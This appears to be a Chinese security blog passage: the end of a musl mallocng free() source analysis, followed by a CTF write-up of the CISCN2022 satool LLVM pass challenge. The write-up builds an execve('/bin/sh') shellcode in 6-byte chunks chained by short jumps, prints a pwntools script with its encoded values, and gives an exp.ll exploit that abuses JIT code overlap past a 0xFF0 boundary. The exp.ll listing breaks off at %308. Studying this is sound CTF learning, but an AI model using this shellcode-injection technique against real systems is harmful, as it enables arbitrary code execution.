下面是if (!(mask & ((2u<<m->mem->active_idx)-1)))，mask是释放chunk的掩码，后面是全1的掩码，如果两者相与等于0，说明这个meta中没有chunk被释放。这个if语句是想要尽可能地使用已经有chunk被释放的meta而尽可能保留全部chunk都可以使用的meta，这样做的目的是减少脏页面的产生。内部判断如果这个meta不是仅有的一个meta，则使用下一个meta，否则没办法就只能使用这个“干净的”meta，else中所做的是在group中选择一个可以使用的chunk并设置相应控制位。

循环外面，是设置meta的avail_mask位，并返回将要分配出去的chunk索引。

free（`/src/malloc/mallocng/free.c, line 101`）

void free(void *p)
{
	if (!p) return;

	struct meta *g = get_meta(p);
	int idx = get_slot_index(p);
	size_t stride = get_stride(g);
	unsigned char *start = g->mem->storage + stride*idx;
	unsigned char *end = start + stride - IB;
	get_nominal_size(p, end);
	uint32_t self = 1u<<idx, all = (2u<<g->last_idx)-1;
	((unsigned char *)p)[-3] = 255;
	// invalidate offset to group header, and cycle offset of
	// used region within slot if current offset is zero.
	*(uint16_t *)((char *)p-2) = 0;

	// release any whole pages contained in the slot to be freed
	// unless it's a single-slot group that will be unmapped.
	if (((uintptr_t)(start-1) ^ (uintptr_t)end) >= 2*PGSZ && g->last_idx) {
		unsigned char *base = start + (-(uintptr_t)start & (PGSZ-1));
		size_t len = (end-base) & -PGSZ;
		if (len) {
			int e = errno;
			madvise(base, len, MADV_FREE);
			errno = e;
		}
	}

	// atomic free without locking if this is neither first or last slot
	for (;;) {
		uint32_t freed = g->freed_mask;
		uint32_t avail = g->avail_mask;
		uint32_t mask = freed | avail;
		assert(!(mask&self));
		if (!freed || mask+self==all) break;
		if (!MT)
			g->freed_mask = freed+self;
		else if (a_cas(&g->freed_mask, freed, freed+self)!=freed)
			continue;
		return;
	}

	wrlock();
	struct mapinfo mi = nontrivial_free(g, idx);
	unlock();
	if (mi.len) {
		int e = errno;
		munmap(mi.base, mi.len);
		errno = e;
	}
}

free用于释放chunk，首先需要找到该chunk所在的meta。这个功能是如何实现的呢？

每一个chunk的前面都保存着这个chunk在group中的索引，通过get_slot_index函数我们就可以知道：

static inline int get_slot_index(const unsigned char *p)
{
	return p[-3] & 31;
}

可见索引值保存在索引为-3的位置。

对于索引值不为0的chunk，其还有一个offset保存在索引为-2的位置，它记录了当前chunk与第一个chunk首部的偏移量（右移4位的结果），因此通过这个值我们可以计算出该chunk所在group的首地址，由group中保存的meta地址找到meta。在get_meta函数中，找到meta后又找到了该meta所在的meta_area并进行了多项检查，防止group被伪造，如果我们想要通过伪造group来进行漏洞利用，就需要特别注意这里，这个我们以后再说。

// /src/malloc/mallocng/meta.h, line 129
static inline struct meta *get_meta(const unsigned char *p)
{
	assert(!((uintptr_t)p & 15));
	int offset = *(const uint16_t *)(p - 2);
	int index = get_slot_index(p);
	if (p[-4]) {
		assert(!offset);
		offset = *(uint32_t *)(p - 8);
		assert(offset > 0xffff);
	}
	const struct group *base = (const void *)(p - UNIT*offset - UNIT);
	const struct meta *meta = base->meta;
	assert(meta->mem == base);
	assert(index <= meta->last_idx);
	assert(!(meta->avail_mask & (1u<<index)));
	assert(!(meta->freed_mask & (1u<<index)));
	const struct meta_area *area = (void *)((uintptr_t)meta & -4096);
	assert(area->check == ctx.secret);
	if (meta->sizeclass < 48) {
		assert(offset >= size_classes[meta->sizeclass]*index);
		assert(offset < size_classes[meta->sizeclass]*(index+1));
	} else {
		assert(meta->sizeclass == 63);
	}
	if (meta->maplen) {
		assert(offset <= meta->maplen*4096UL/UNIT - 1);
	}
	return (struct meta *)meta;
}

anyway，拿到了meta地址之后，通过get_stride函数获取到其中保存的chunk的大小。

后面定义了一系列的变量，看到第一个if语句：if (((uintptr_t)(start-1) ^ (uintptr_t)end) >= 2*PGSZ && g->last_idx)。前面一个判断条件是判断这个chunk的大小是否大于2页（PGSZ就是一页的大小），后面的则是判断这个chunk是否是由malloc通过mmap分配出来的。记得在分析malloc时提到当分配的chunk过大时会使用mmap直接分配且last_idx的值会被设置为0。这个if语句的主要目的是在释放一个较大的chunk时，将该chunk内含的一些页在内核层面上释放，这通过madvice系统调用来实现。

往后是一个循环。如果该chunk所在的meta的free_mask为0（表示当前的chunk是该meta中唯一一个释放的chunk）或该chunk释放后该meta中所有chunk都被释放，则跳出循环。否则修改free_mask位后返回。这里面的if-else语句不用管，因为涉及锁的问题，一般Linux系统都会加锁，因此else基本不会执行到。

如果释放的chunk既不是第一个，也不是最后一个，则会执行循环后面的代码。后面的调用nontrivial_free是关键操作，也是我们利用的突破点。

nontrivial_free（`/src/malloc/mallocng/free.c, line 72`）

static struct mapinfo nontrivial_free(struct meta *g, int i)
{
	uint32_t self = 1u<<i;
	int sc = g->sizeclass;
	uint32_t mask = g->freed_mask | g->avail_mask;

	if (mask+self == (2u<<g->last_idx)-1 && okay_to_free(g)) {
		// any multi-slot group is necessarily on an active list
		// here, but single-slot groups might or might not be.
		if (g->next) {
			assert(sc < 48);
			int activate_new = (ctx.active[sc]==g);
			dequeue(&ctx.active[sc], g);
			if (activate_new && ctx.active[sc])
				activate_group(ctx.active[sc]);
		}
		return free_group(g);
	} else if (!mask) {
		assert(sc < 48);
		// might still be active if there were no allocations
		// after last available slot was taken.
		if (ctx.active[sc] != g) {
			queue(&ctx.active[sc], g);
		}
	}
	a_or(&g->freed_mask, self);
	return (struct mapinfo){ 0 };
}

大多数的chunk释放请求都会执行到这个函数，第一个参数是meta，第二个是该meta内需要释放的chunk的索引。

mask是free_mask和avail_mask相或的结果，二者都是比特位标识的控制位。第一个判断if (mask+self == (2u<<g->last_idx)-1 && okay_to_free(g))中第一个条件指的是该meta中所有chunk是否都处于被使用或被释放的状态，第二个条件通过一个函数判断这个chunk是否可以释放，一般都为真。进入if语句体中判断该meta是否有下一个meta，如果有，将当前meta出链表，且如果该meta在出链表之前是链首且此时该链表中还有meta，则激活链首的meta。这里的激活（activate_group）是修改了avail_mask值，函数内强制要求该meta在修改前的avail_mask为0。然后调用free_group并返回。

如果进入了else语句体，说明mask=0，即free_mask和avail_mask均为0，该meta中所有chunk均正在被使用。如果该meta不是链首，则将该meta链入链表。最后更新free_mask并返回。

至此，有关于musl内存分配与释放的相关函数已经基本分析完毕，下一篇文章将重点介绍musl libc的利用方式。

LLVM pass pwn 入门 (4)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， llvm pass pwn 系列
本文字数： 25k 阅读时长 ≈ 23 分钟

有了前面两道题的分析基础之后，我们不难发现，LLVM实际上就是一类基于C++的VM pwn，我们通过定义不同名字的函数或写入不同类型的指令让vm做一些事情，其中就包含触发漏洞。这篇文章笔者来分析一下2022年，也就是今年国赛题中的satool这道题。

CISCN2022-satool

Step 1: 通过README了解这个LLVM pass的功能

附件一共给了两个文件，有一个是readme文件，打开看看。

## Introduction

A LLVM Pass that can optimize add/sub instructions.

## How to run

opt-12 -load ./mbaPass.so -mba {*.bc/*.ll} -S

## Example

### IR before optimization


define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = sub nsw i64 %0, 2
  %3 = add nsw i64 %2, 68
  %4 = add nsw i64 %0, 6
  %5 = add nsw i64 %4, -204
  %6 = add nsw i64 %5, %3
  ret i64 %6
}


### IR after optimization


define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = mul i64 %0, 2
  %3 = add i64 %2, -132
  ret i64 %3
}

这是一个优化加减法的llvm pass，就像上面例子演示的一样，将多步加减法转换为两步的乘法和加法，即一个简单的合并同类项的优化。对于这种涉及算法的逆向，我们不妨首先想想，如果自己需要实现这个功能，应该如何编写算法。
现在我们来看看源码中有什么漏洞。

Step 2: 找到runOnFunction覆写函数

这道题的源码中没有无名的函数，这是因为符号表还在，更便于我们理解程序逻辑。当符号表还在的时候，我们应该找的是匿名命名空间的函数，别忘了第一篇文章中我们自己写的示例，就是将函数声什么的全部写在一个匿名空间中的。由此我们很容易能够找到runOnFunction函数。

接下来，我们进入runOnFunction查看。

Step 3: 分析runOnFunction函数

Segment 1

进入函数，首先是一个判断，通过报错字符串信息可以得知，这里是限定我们的函数只能有一个参数和一个基本块。

Segment 2

接下来是调用了两个MBAPass类中的函数，首先查看MBAPass类的构造函数可知，this+4指针指向了一个mmap空间，大小为0x1000。首先其将这块内存的权限改为可写可执行，然后执行了handle函数，之后再将权限改为可读可执行，执行callCode函数。我们还是首先看下这两个函数的执行流程。

Step 4: 分析handle函数

handle函数传入的第一个参数是MBAPass对象自身，第二个参数v29是llvm.Function指针。打开handle一看，好家伙这么多代码，一点点分析。

Segment 1

猜测：v29是第一个基本块，Terminator是结束符的意思，暂时还不清楚到底指什么，Operand是操作数。

Segment 2

注意这里的llvm::isa相当于Java中的instanceof关键字，判断Operand是否是llvm::constant的实例。如果是，说明这个操作数是一个常量数值，随后将其转换为整型常量并有符号扩展。然后调用了他自己定义的函数writeMovImm64。这个函数的功能是构建机器码指令，一开始想查Intel手册发现看不懂，后来直接用反汇编才试出来。writeMovImm64的功能是：当第二个参数为0时，向事先mmap的空间中写入"mov rbx, <第三个参数>“指令，若第二个参数不为0则写入"mov rax, <第三个参数>指令”。这两个指令都占10字节，写入完毕后指针后移10准备下一次写入。同理可以试出来writeRet函数就是写入一个"ret"指令。基于此我们也可以知道this+5这个指针的作用，其是用来作为mmap空间的游标使用的，在指针指向的位置写入指令。

Segment 3

这里判断操作数是否是函数的参数。然后写入"mov rbx, 0; ret"指令。

Segment 4

如果操作数既不是立即数，又不是参数，那可能是局部变量。在else语句块中首先实例化了两个STL stack对象，分别为v25和v26变量，然后进行了push操作。如果写入指针的游标大于v30，就直接写入一个ret指令返回（v30=mmap内存起始地址+0xFF0，记住这个0xFF0，后面有关键作用）。

Segment 5

再次之后弹出了两个栈顶的东西，其中将先弹出的转化为了二元运算符对象，当转换出错时还会报错。说明位于栈顶的应该是一个二元运算符。

Segment 6

后面就开始判断运算符的种类了。还记得运算符的种类应该在哪一个文件里面查询吗？llvm/IR/Instructions.def！查询到13表示的是加法，15表示的是减法。这里的意思是二元运算符只能是加或减，否则报错退出。

Segment 7

这里的v20和v19容易猜出来就是二元运算符的两个操作数。

后面首先判断v20是否是常量。如果是则判断其值是否为1或-1。若是则调用writeInc函数写入"inc rax"或"dec rax"指令，若不是则调用writeOpReg函数写入"add rax, rbx"指令（第二个参数是1。若第二个参数为0就是"sub rax, rbx"指令）。

如果v20是参数，则在this+12处加上v22。至于this+22是什么尚且不清楚，后面再行判断。

如果既不是常量也不是参数，则push压栈。通过栈后面的类型可以知道，v25中的值一定都是整数，而v26中的值是对象，其可以表示变量也可以表示一个常量。

Segment 8

handle函数的最后一个部分，和Segment 7相同，Segment 7处理的是加减法的第一个操作数，而Segment 8以同样的方式处理第二个操作数。不过在此之前有一个判断符号的if语句，当运算为减的时候会将v22取相反数。

看到这里，我们已经对handle函数有了一些初步的了解，但是在细节方面的理解还是不够透彻。因此我们来尝试写一个函数，看看handle函数处理的全过程到底是什么样的。

这是根据readme函数改编的一段代码，只有后面的数值修改了（注意本题的.ll文件不能通过clang生成，因为clang生成的.ll代码会有一些store等其他指令的存在，mbapass无法识别）。我们下断点到stack析构函数调用的地方，也就是handle函数的末尾，看一下此时this+4这个mmap空间的情况。

; ModuleID = 'test.c'
source_filename = "test.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @test(i64 %0) #0 {
  %2 = sub nsw i64 %0, 285912734
  %3 = add nsw i64 %2, 685392891
  %4 = add nsw i64 %0, 653902180
  %5 = add nsw i64 %4, -204343281
  %6 = add nsw i64 %5, %3
  ret i64 %6
}

attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}

下面是mmap空间的情况：

可以看出handle函数将我们的5行代码转换为了汇编指令保存。和静态分析的结果符合、

Step 5: 分析callCode函数，思考利用方式

callCode函数很简单，就是执行刚刚写入到mmap空间的汇编指令。

由此可见，我们可以执行这一段指令。但是这里的指令只能是有限的几种，并不能达到我们的目的。不过别忘了我们第4步分析handle函数时注意到的一个小细节：当生成的汇编指令长度大于0xFF0时，handle函数不会再继续向下解析.ll代码，而是会直接退出。但很明显我们完全有可能让handle函数生成的汇编指令长度比0xFF0大几个字节，即让最后一条指令越过0xFF0的边界。注意其依然会执行。而且mmap出来的空间没有被释放，这说明当handle函数解析第二个函数的时候，我们之前解析得到的指令还保留在mmap空间中。如果两次解析出来的指令有错位，就可能会产生新的指令。

如第一次解析的指令为：

movabs rax, 0	; 0x0
movabs rax, 0x12345678	; 0xA
mov rbx, rax	; 0x14
movabs rax, 0x87654321	; 0x1E

第二次解析的指令为：

movabs rax, 0	; 0x0
movabs rax, 0x12345678	; 0xA
mov rbx, rax	; 0x14
mov rbx, rax	; 0x17

那么对于0x1A~0x1E这5个字节，如果有实际含义的话，很可能会被当成汇编指令执行，而这5个字节在第一次解析中是作为立即数存在，是可以被我们随意控制的。由此我们就可以执行一条长度不大于5字节的任意指令。不过需要注意的是，如果我们写的汇编指令长度不足0xFF0字节，在循环中会写入一个ret指令进去，跳出循环的条件就是汇编指令长度大于0xFF0，因此要想循环中添加ret指令的这个函数不调用，就必须要使得写入的汇编指令长度大于0xFF0字节，这样才能够执行0xFF0后面几个字节的任意代码。

通过测试我们可以发现，inc指令占用3字节，mov rax, rbx指令占用3字节，向rax或rbx直接赋值占用10字节。由于3和10的最大公因数为1，因此我们可以构造任意长度在0xFF0左右的汇编代码。但是很明显，不可能有shellcode能够用仅仅几个字节就getshell。考虑到我们可以控制movabs指令中的后8字节，可以将shellcode写到这一个个的8字节之中，再通过短转移指令将它们连接在一起，就有可能执行一个完整的shellcode。注意：短转移指令的长度为2字节，因此每一个8字节中的指令不能超过6字节。因此现有的shellcode可能无法直接使用，需要我们根据实际的调试结果进行一定的调整。

为了shellcode编写的方便，我们将movabs指令作为我们写入的主要指令。通过前面的调试结果可以得知，绝大多数的movabs指令后面都回跟上一个add rax, rbx指令。我们人为规定每一个movabs中写入一条指令，然后通过短转移指令跳到前面一个movabs中的指令。

下面，我们就来构造我们预期要执行的shellcode。

Step 6: 构造shellcode

我们直接使用pwntools中给出的模板，在其基础上进行修改。

/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
mov rdi, rsp
/* push argument array ['sh\x00'] */
/* push b'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor esi, esi /* 0 */
push rsi /* null terminate */
push 8
pop rsi
add rsi, rsp
push rsi /* 'sh\x00' */
mov rsi, rsp
xor edx, edx /* 0 */
/* call execve() */
push SYS_execve /* 0x3b */
pop rax
syscall

push 0x68：机器码jh，占用2字节。
mov rax, 0x732f2f2f6e69622f：占用10字节，进行改写：
(1) mov eax, 0x732f2f2f：机器码\xb8///s，占用5字节。
(2) shl rax, 32：机器码H\xc1\xe0<space>，占用4字节（<space>指空格）。
(3) add rax, 0x6e69622f：机器码H\x05/bin，占用6字节。
push rax：机器码P，占用1字节。
mov rdi, rsp：机器码H\x89\xe7，占用3字节。
push 0x1010101 ^ 0x6873：机器码hri\x01\x01，但其与下一步可以合并：
push 0x6873：机器码hsh\x00\x00，占用5字节。
xor esi, esi：机器码1\xf6，占用2字节。
push rsi：机器码V，占用1字节。
push 8：机器码j\x08，占用2字节。
pop rsi：机器码^，占用1字节。
add rsi, rsp：机器码H\x01\xe6，占用3字节。
push rsi：机器码V，占用1字节。
mov rsi, rsp：机器码H\x89\xe6，占用3字节。
xor edx, edx：机器码1\xd2，占用2字节。
push SYS_execve：机器码j;，占用2字节。
pop rax：机器码X，占用1字节。
syscall：机器码\x0f\x05，占用2字节。

机器码分析完毕。我们发现有一些指令很短，可以几条合并。如3和4合并、6和7和8和9合并、10和11合并、12和13合并、14和15和16合并。但是为了批量生成指令机器码的方便，每个8字节中只填充一个shellcode指令。我们让短转移指令固定在最后2字节，前面的指令不够6字节的使用nop指令补充。我们使用脚本尝试生成一下：

from pwn import *
context.arch='amd64'

shellcode = [
			 "push 0x68",
	     	 "mov eax, 0x732f2f2f",
	     	 "shl rax, 32",
	     	 "add rax, 0x6e69622f",
	     	 "push rax",
	     	 "mov rdi, rsp",
	     	 "push 0x6873",
	     	 "xor esi, esi",
	     	 "push rsi",
	     	 "push 8",
	     	 "pop rsi",
	     	 "add rsi, rsp",
	     	 "push rsi",
	     	 "mov rsi, rsp",
	     	 "xor edx, edx",
	     	 "push SYS_execve",
	     	 "pop rax",
	     	 "syscall"
	     	]

for code in shellcode:
	bytes = asm(code).ljust(6, b'\x90') + b'\xEB\xE9'	# \xEB\xEB: jmp short ptr -21, 思考一下-21这个数是怎么得出来的
	print(u64(bytes))

输出结果：

16999840169015142506
16999840042827329464
16999840167141359944
16999802617337939272
16999840169015152720
16999840169020852552
16999839548121314152
16999840169015178801
16999840169015152726
16999840169015117930
16999840169015152734
16999840169020752200
16999840169015152726
16999840169020787016
16999840169015169585
16999840169015130986
16999840169015152728
16999840169015117071

接下来，我们要进行调试，构造出能够产生jmp指令两个长函数以供handle函数解析。

Step 7: getshell

我们在一个函数中写入很多的add指令，就像下面这样。经过测试得出=，当写到%315时，有一个movabs指令能够成功溢出到0xFF0之后，不过这是第一条指令。因此我们写shellcode应该写在前面几个指令中。

下面是解析第一个函数后最后几个字节的情况：

下面是解析第二个函数后最后几个字节的情况：

由下图可以得出，我们可以控制的是第一个函数最后一个movabs中最后的4个字节：

根据下图可知，第一个短转移（即图中的jmp）偏移应该为：-(0xff3-(0xfde+2))=-0x13=0xed

如图所示，这样就可以跳转到我们的第一个shellcode了。第一个立即数的值应该为0xEDEB00000000。（低4字节无所谓）

然后我们只要将上面脚本中的值依次写入到下面即可。

成功getshell。

exp.ll如下：

; ModuleID = 'test.c'
source_filename = "test.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @test(i64 %0) #0 {
  %2 = add nsw i64 %0, 261593573097472
  %3 = add nsw i64 %2, 256
  %4 = add nsw i64 %3, 256
  %5 = add nsw i64 %4, 256
  %6 = add nsw i64 %5, 256
  %7 = add nsw i64 %6, 256
  %8 = add nsw i64 %7, 256
  %9 = add nsw i64 %8, 256
  %10 = add nsw i64 %9, 256
  %11 = add nsw i64 %10, 256
  %12 = add nsw i64 %11, 256
  %13 = add nsw i64 %12, 256
  %14 = add nsw i64 %13, 256
  %15 = add nsw i64 %14, 256
  %16 = add nsw i64 %15, 256
  %17 = add nsw i64 %16, 256
  %18 = add nsw i64 %17, 256
  %19 = add nsw i64 %18, 256
  %20 = add nsw i64 %19, 256
  %21 = add nsw i64 %20, 256
  %22 = add nsw i64 %21, 256
  %23 = add nsw i64 %22, 256
  %24 = add nsw i64 %23, 256
  %25 = add nsw i64 %24, 256
  %26 = add nsw i64 %25, 256
  %27 = add nsw i64 %26, 256
  %28 = add nsw i64 %27, 256
  %29 = add nsw i64 %28, 256
  %30 = add nsw i64 %29, 256
  %31 = add nsw i64 %30, 256
  %32 = add nsw i64 %31, 256
  %33 = add nsw i64 %32, 256
  %34 = add nsw i64 %33, 256
  %35 = add nsw i64 %34, 256
  %36 = add nsw i64 %35, 256
  %37 = add nsw i64 %36, 256
  %38 = add nsw i64 %37, 256
  %39 = add nsw i64 %38, 256
  %40 = add nsw i64 %39, 256
  %41 = add nsw i64 %40, 256
  %42 = add nsw i64 %41, 256
  %43 = add nsw i64 %42, 256
  %44 = add nsw i64 %43, 256
  %45 = add nsw i64 %44, 256
  %46 = add nsw i64 %45, 256
  %47 = add nsw i64 %46, 256
  %48 = add nsw i64 %47, 256
  %49 = add nsw i64 %48, 256
  %50 = add nsw i64 %49, 256
  %51 = add nsw i64 %50, 256
  %52 = add nsw i64 %51, 256
  %53 = add nsw i64 %52, 256
  %54 = add nsw i64 %53, 256
  %55 = add nsw i64 %54, 256
  %56 = add nsw i64 %55, 256
  %57 = add nsw i64 %56, 256
  %58 = add nsw i64 %57, 256
  %59 = add nsw i64 %58, 256
  %60 = add nsw i64 %59, 256
  %61 = add nsw i64 %60, 256
  %62 = add nsw i64 %61, 256
  %63 = add nsw i64 %62, 256
  %64 = add nsw i64 %63, 256
  %65 = add nsw i64 %64, 256
  %66 = add nsw i64 %65, 256
  %67 = add nsw i64 %66, 256
  %68 = add nsw i64 %67, 256
  %69 = add nsw i64 %68, 256
  %70 = add nsw i64 %69, 256
  %71 = add nsw i64 %70, 256
  %72 = add nsw i64 %71, 256
  %73 = add nsw i64 %72, 256
  %74 = add nsw i64 %73, 256
  %75 = add nsw i64 %74, 256
  %76 = add nsw i64 %75, 256
  %77 = add nsw i64 %76, 256
  %78 = add nsw i64 %77, 256
  %79 = add nsw i64 %78, 256
  %80 = add nsw i64 %79, 256
  %81 = add nsw i64 %80, 256
  %82 = add nsw i64 %81, 256
  %83 = add nsw i64 %82, 256
  %84 = add nsw i64 %83, 256
  %85 = add nsw i64 %84, 256
  %86 = add nsw i64 %85, 256
  %87 = add nsw i64 %86, 256
  %88 = add nsw i64 %87, 256
  %89 = add nsw i64 %88, 256
  %90 = add nsw i64 %89, 256
  %91 = add nsw i64 %90, 256
  %92 = add nsw i64 %91, 256
  %93 = add nsw i64 %92, 256
  %94 = add nsw i64 %93, 256
  %95 = add nsw i64 %94, 256
  %96 = add nsw i64 %95, 256
  %97 = add nsw i64 %96, 256
  %98 = add nsw i64 %97, 256
  %99 = add nsw i64 %98, 256
  %100 = add nsw i64 %99, 256
  %101 = add nsw i64 %100, 256
  %102 = add nsw i64 %101, 256
  %103 = add nsw i64 %102, 256
  %104 = add nsw i64 %103, 256
  %105 = add nsw i64 %104, 256
  %106 = add nsw i64 %105, 256
  %107 = add nsw i64 %106, 256
  %108 = add nsw i64 %107, 256
  %109 = add nsw i64 %108, 256
  %110 = add nsw i64 %109, 256
  %111 = add nsw i64 %110, 256
  %112 = add nsw i64 %111, 256
  %113 = add nsw i64 %112, 256
  %114 = add nsw i64 %113, 256
  %115 = add nsw i64 %114, 256
  %116 = add nsw i64 %115, 256
  %117 = add nsw i64 %116, 256
  %118 = add nsw i64 %117, 256
  %119 = add nsw i64 %118, 256
  %120 = add nsw i64 %119, 256
  %121 = add nsw i64 %120, 256
  %122 = add nsw i64 %121, 256
  %123 = add nsw i64 %122, 256
  %124 = add nsw i64 %123, 256
  %125 = add nsw i64 %124, 256
  %126 = add nsw i64 %125, 256
  %127 = add nsw i64 %126, 256
  %128 = add nsw i64 %127, 256
  %129 = add nsw i64 %128, 256
  %130 = add nsw i64 %129, 256
  %131 = add nsw i64 %130, 256
  %132 = add nsw i64 %131, 256
  %133 = add nsw i64 %132, 256
  %134 = add nsw i64 %133, 256
  %135 = add nsw i64 %134, 256
  %136 = add nsw i64 %135, 256
  %137 = add nsw i64 %136, 256
  %138 = add nsw i64 %137, 256
  %139 = add nsw i64 %138, 256
  %140 = add nsw i64 %139, 256
  %141 = add nsw i64 %140, 256
  %142 = add nsw i64 %141, 256
  %143 = add nsw i64 %142, 256
  %144 = add nsw i64 %143, 256
  %145 = add nsw i64 %144, 256
  %146 = add nsw i64 %145, 256
  %147 = add nsw i64 %146, 256
  %148 = add nsw i64 %147, 256
  %149 = add nsw i64 %148, 256
  %150 = add nsw i64 %149, 256
  %151 = add nsw i64 %150, 256
  %152 = add nsw i64 %151, 256
  %153 = add nsw i64 %152, 256
  %154 = add nsw i64 %153, 256
  %155 = add nsw i64 %154, 256
  %156 = add nsw i64 %155, 256
  %157 = add nsw i64 %156, 256
  %158 = add nsw i64 %157, 256
  %159 = add nsw i64 %158, 256
  %160 = add nsw i64 %159, 256
  %161 = add nsw i64 %160, 256
  %162 = add nsw i64 %161, 256
  %163 = add nsw i64 %162, 256
  %164 = add nsw i64 %163, 256
  %165 = add nsw i64 %164, 256
  %166 = add nsw i64 %165, 256
  %167 = add nsw i64 %166, 256
  %168 = add nsw i64 %167, 256
  %169 = add nsw i64 %168, 256
  %170 = add nsw i64 %169, 256
  %171 = add nsw i64 %170, 256
  %172 = add nsw i64 %171, 256
  %173 = add nsw i64 %172, 256
  %174 = add nsw i64 %173, 256
  %175 = add nsw i64 %174, 256
  %176 = add nsw i64 %175, 256
  %177 = add nsw i64 %176, 256
  %178 = add nsw i64 %177, 256
  %179 = add nsw i64 %178, 256
  %180 = add nsw i64 %179, 256
  %181 = add nsw i64 %180, 256
  %182 = add nsw i64 %181, 256
  %183 = add nsw i64 %182, 256
  %184 = add nsw i64 %183, 256
  %185 = add nsw i64 %184, 256
  %186 = add nsw i64 %185, 256
  %187 = add nsw i64 %186, 256
  %188 = add nsw i64 %187, 256
  %189 = add nsw i64 %188, 256
  %190 = add nsw i64 %189, 256
  %191 = add nsw i64 %190, 256
  %192 = add nsw i64 %191, 256
  %193 = add nsw i64 %192, 256
  %194 = add nsw i64 %193, 256
  %195 = add nsw i64 %194, 256
  %196 = add nsw i64 %195, 256
  %197 = add nsw i64 %196, 256
  %198 = add nsw i64 %197, 256
  %199 = add nsw i64 %198, 256
  %200 = add nsw i64 %199, 256
  %201 = add nsw i64 %200, 256
  %202 = add nsw i64 %201, 256
  %203 = add nsw i64 %202, 256
  %204 = add nsw i64 %203, 256
  %205 = add nsw i64 %204, 256
  %206 = add nsw i64 %205, 256
  %207 = add nsw i64 %206, 256
  %208 = add nsw i64 %207, 256
  %209 = add nsw i64 %208, 256
  %210 = add nsw i64 %209, 256
  %211 = add nsw i64 %210, 256
  %212 = add nsw i64 %211, 256
  %213 = add nsw i64 %212, 256
  %214 = add nsw i64 %213, 256
  %215 = add nsw i64 %214, 256
  %216 = add nsw i64 %215, 256
  %217 = add nsw i64 %216, 256
  %218 = add nsw i64 %217, 256
  %219 = add nsw i64 %218, 256
  %220 = add nsw i64 %219, 256
  %221 = add nsw i64 %220, 256
  %222 = add nsw i64 %221, 256
  %223 = add nsw i64 %222, 256
  %224 = add nsw i64 %223, 256
  %225 = add nsw i64 %224, 256
  %226 = add nsw i64 %225, 256
  %227 = add nsw i64 %226, 256
  %228 = add nsw i64 %227, 256
  %229 = add nsw i64 %228, 256
  %230 = add nsw i64 %229, 256
  %231 = add nsw i64 %230, 256
  %232 = add nsw i64 %231, 256
  %233 = add nsw i64 %232, 256
  %234 = add nsw i64 %233, 256
  %235 = add nsw i64 %234, 256
  %236 = add nsw i64 %235, 256
  %237 = add nsw i64 %236, 256
  %238 = add nsw i64 %237, 256
  %239 = add nsw i64 %238, 256
  %240 = add nsw i64 %239, 256
  %241 = add nsw i64 %240, 256
  %242 = add nsw i64 %241, 256
  %243 = add nsw i64 %242, 256
  %244 = add nsw i64 %243, 256
  %245 = add nsw i64 %244, 256
  %246 = add nsw i64 %245, 256
  %247 = add nsw i64 %246, 256
  %248 = add nsw i64 %247, 256
  %249 = add nsw i64 %248, 256
  %250 = add nsw i64 %249, 256
  %251 = add nsw i64 %250, 256
  %252 = add nsw i64 %251, 256
  %253 = add nsw i64 %252, 256
  %254 = add nsw i64 %253, 256
  %255 = add nsw i64 %254, 256
  %256 = add nsw i64 %255, 256
  %257 = add nsw i64 %256, 256
  %258 = add nsw i64 %257, 256
  %259 = add nsw i64 %258, 256
  %260 = add nsw i64 %259, 256
  %261 = add nsw i64 %260, 256
  %262 = add nsw i64 %261, 256
  %263 = add nsw i64 %262, 256
  %264 = add nsw i64 %263, 256
  %265 = add nsw i64 %264, 256
  %266 = add nsw i64 %265, 256
  %267 = add nsw i64 %266, 256
  %268 = add nsw i64 %267, 256
  %269 = add nsw i64 %268, 256
  %270 = add nsw i64 %269, 256
  %271 = add nsw i64 %270, 256
  %272 = add nsw i64 %271, 256
  %273 = add nsw i64 %272, 256
  %274 = add nsw i64 %273, 256
  %275 = add nsw i64 %274, 256
  %276 = add nsw i64 %275, 256
  %277 = add nsw i64 %276, 256
  %278 = add nsw i64 %277, 256
  %279 = add nsw i64 %278, 256
  %280 = add nsw i64 %279, 256
  %281 = add nsw i64 %280, 256
  %282 = add nsw i64 %281, 256
  %283 = add nsw i64 %282, 256
  %284 = add nsw i64 %283, 256
  %285 = add nsw i64 %284, 256
  %286 = add nsw i64 %285, 256
  %287 = add nsw i64 %286, 256
  %288 = add nsw i64 %287, 256
  %289 = add nsw i64 %288, 256
  %290 = add nsw i64 %289, 256
  %291 = add nsw i64 %290, 256
  %292 = add nsw i64 %291, 256
  %293 = add nsw i64 %292, 256
  %294 = add nsw i64 %293, 256
  %295 = add nsw i64 %294, 256
  %296 = add nsw i64 %295, 256
  %297 = add nsw i64 %296, 256
  %298 = add nsw i64 %297, 256
  %299 = add nsw i64 %298, 256
  %300 = add nsw i64 %299, 256
  %301 = add nsw i64 %300, 256
  %302 = add nsw i64 %301, 256
  %303 = add nsw i64 %302, 256
  %304 = add nsw i64 %303, 256
  %305 = add nsw i64 %304, 256
  %306 = add nsw i64 %305, 256
  %307 = add nsw i64 %306, 256
  %308 = add nsw i64 %307, 256
